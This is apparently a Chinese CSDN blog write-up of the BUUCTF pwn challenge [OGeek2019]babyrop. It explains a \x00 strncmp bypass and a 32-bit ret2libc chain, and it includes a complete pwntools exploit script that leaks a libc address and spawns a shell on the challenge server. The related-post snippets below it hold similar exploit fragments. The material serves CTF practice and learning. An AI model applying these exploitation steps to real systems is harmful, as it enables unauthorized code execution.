[OGeek2019]babyrop

已于 2023-07-24 12:34:24 修改
阅读量190 收藏
点赞数
文章标签: 安全 网络安全
于 2023-07-24 01:40:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ethan18/article/details/131887237
版权

这道题研究了好久。。。顺便算是复习基本ROP思想吧,基本ROP攻击这里我已经待了好久了感觉,这也算是一种总结了

拿到题目首先判断checksec和文件的运行系统
在这里插入图片描述
发现no canary的时候就已经有理由感觉是关于栈溢出了
然后进入ida pro
在这里插入图片描述
发现是将一个四个字节的东西放进了buf,再调用了一个函数
在这里插入图片描述
其实在buuctf中有一道叫ciscn_2019_c_1的题目也喜欢用这个思想,不过那道题是针对函数strlen,而这道题目是针对strncmp,但是这个思路很重要,那就是**\x00绕过**

具体而言,就是在字符串最开始的地方输入转义符\x00,这样在涉及到字符串函数的地方都可以进行绕过判断条件,让其变为0

这可能是我做这几天题目中的一个最经典的小Trick(上一个博客那个强行覆盖got表中的字符串的思路简直是个大trick,思路对我来说惊为天人)

知道了这点以后,我们也只是知道了第一个输入的是\x00,并且我们的buf[7],也就是第8个字符会返回,然后其会进入第二个函数,接着看第2个函数
在这里插入图片描述
发现意思是a1必须等于127的话会有0xc8,也就是200个字节可以进行输入,但是我们估计以后发现我们要是实现栈溢出,起码要有f7,也就是247给字节,所以这就需要我们直接把a1变得很大很大

于是我们就可以进行第一个payload的构建,完成了第一步

payload = b'\x00'+b'a'*(0x6)+b'\xff'+b'\xff'

后面的内容就是和ret2libc是一样的思路了,不过这次我学乖了,我还是使用了Libcsearcher,在线网站虽然也可以,但是还是太折磨人了,至少在工作量方面Libcsearcher是真的好用

exp如下:

from pwn import *
from LibcSearcher import *
sh=remote('node4.buuoj.cn','27599')#连接远程靶机

pwn_elf = ELF('./pwn')

__libc_start_main_plt = 0x8048570
__libc_start_main_got = pwn_elf.got["__libc_start_main"]
puts_plt = 0x8048548
puts_got = pwn_elf.got["puts"]
main_addr = 0x08048825
read_got = pwn_elf.got["read"]

payload = b'\x00'+b'a'*(0x6)+b'\xff'+b'\xff'
sh.sendline(payload)

sh.recvuntil("Correct\n")
payload1 =b"a"*(0xe7+0x4)+p32(puts_plt)+p32(main_addr)+p32(__libc_start_main_got)


sh.sendline(payload1)

__libc_start_main_addr = (u32(sh.recv(4)))
#print(hex(__libc_start_main_addr))

libc = LibcSearcher("__libc_start_main",__libc_start_main_addr)

libc_base =__libc_start_main_addr - libc.dump("__libc_start_main")

binsh = libc_base+ libc.dump("str_bin_sh") 
system_addr = 	libc_base+ libc.dump("system")  

sh.sendline(payload)

sh.recvuntil("Correct\n")

payload2 =b"a"*(0xe7+0x4)+p32(system_addr)+p32(main_addr)+p32(binsh)
sh.sendline(payload2)
sh.interactive()

要注意的是:(这是我基础ROP的一些总结)

  • 任何got相关的代码都直接靠pwntool的got模块就好了,不要想着自己研究在ida里面有没有了,我反正是没找到,如果有大佬知道这个在哪的话可以教教我(真的找得到吗?)
  • hex(地址)函数得到的是字符串,不能将其带入地址计算
  • sh.recv(4)是因为是32位系统,栈就是以4位为单位的;如果是64位的话那就应该是sh.recv(8),或者用ljust函数将其扩充为8
  • 高版本ubuntu里调用system函数的时候需要满足堆栈平衡,就是说调用函数之前的字节数需要是16的倍数(64位系统,32位应该是8的倍数)。这道题虽然没有这个问题,但是之前有遇到过这个情况
  • gets函数和scanf函数都可以进行栈溢出漏洞实现
ethanyi9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 251
BUUCTF 做题练习
OGeek2019bayrop
m0_62322730的博客
05-06 369
OGeek2019bayrop
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3768
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 425
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1276
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
天池OGeek算法挑战赛数据.zip
12-21
标题中的“天池OGeek算法挑战赛数据.zip”表明这是一个与阿里巴巴天池平台上的OGeek算法竞赛相关的数据集。天池是阿里云主办的一个数据科学和机器学习竞赛平台,旨在促进数据科学的发展和应用,挑战赛通常涉及到各种...
OGeek
03-19
lgb 代码入口:sh base_run.sh。 写了很多冗余特征,跑起来非常慢,需要做一下特征选择。 线上提交后0.7154。 代码中用到了分词和词向量,需要将切词的代码换成自己的切词代码,需要自己提供词向量。...
TianChi_OGeek
03-19
"TianChi_OGeek"很可能是一个与数据分析或机器学习相关的项目,参与者需要解决特定的数据问题并提交解决方案。在这个项目中,我们遇到了一个具体的问题,即在训练数据集(train)的第1815102行存在一个遗漏的引号,这...
OGeek-数据集
03-30
标题中的“OGeek-数据集”表明这是一个与OGeek相关的数据集合,可能是用于机器学习、数据分析或人工智能项目的训练和评估数据。OGeek可能是一个竞赛平台、研究项目或者是一个专注于数据科学的社区。 描述中只提到...
OGeek:基准线
03-19
"OGeek:基准线"项目是一个基于Python的性能基准测试平台,用于衡量和比较不同算法或代码片段的效率。这个项目的初次提交在线上评测中取得了0.6643的评分,排名为第18位,后续的开发中可能会不断优化思路和策略。 在...
ctf【[OGeek2019]babyrop
HUANGliang_的博客
10-29 259
(1)用0x00绕过strncmp比较 (2)进入sub_80487D0函数进行第二次输入,因为buf有0xe7字节,因此0xc8是不够输入的,为使得多输入一些字符可以将a1写为0xff (3)泄漏read的got地址,求得偏移量,通过溢出执行write函数,打印出read的got地址,并在此之后重新执行sub_80487D0函数 (4)根据得到的read的got地址求偏移量,计算出system函数地址和"\bin\sh"的地址,实施漏洞攻击,夺取权限
Buuctf(pwn)[OGeek2019]babyrop
半岛铁盒的博客
03-25 675
发现第二个函数有个read函数,但它是0x20是不能够构成漏洞利用,只是利用它作为中间的一个简单的输出即可; 跳过if判定: 只需在第一次输入时 在最前面加上 ‘\0’ a1上上一次返回的 buf[7] 这里的漏洞点利用, 要保证 a1的值尽可能的大, 这里选择的是 ‘xff’ – 255 该题目已经为我们提供了Libc Exp可以这样写 from pwn import * p = remote("node3.buuoj.cn",29829) libc=ELF('libc-2.23....
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 519
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
AI安全-文生图
深度安全实验室
08-15 431
AI安全-文生图
探索802.1X:构筑安全网络的认证之盾
最新发布
XINERTEL的博客
08-21 689
首先,让我们了解一下什么是802.1x。802.1x是一个基于端口的网络访问控制机制,由IEEE(电气电子工程师学会)开发,属于IEEE 802.1标准家族。它的主要作用是通过认证管理用户和设备对网络的访问权限。更通俗地说,802.1x就像是网络的门卫,负责检查每一个试图进入网络的设备或用户的身份,只有通过认证的合法用户才能进入。这不仅可以防止未授权的设备接入,还可以确保网络的安全和稳定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值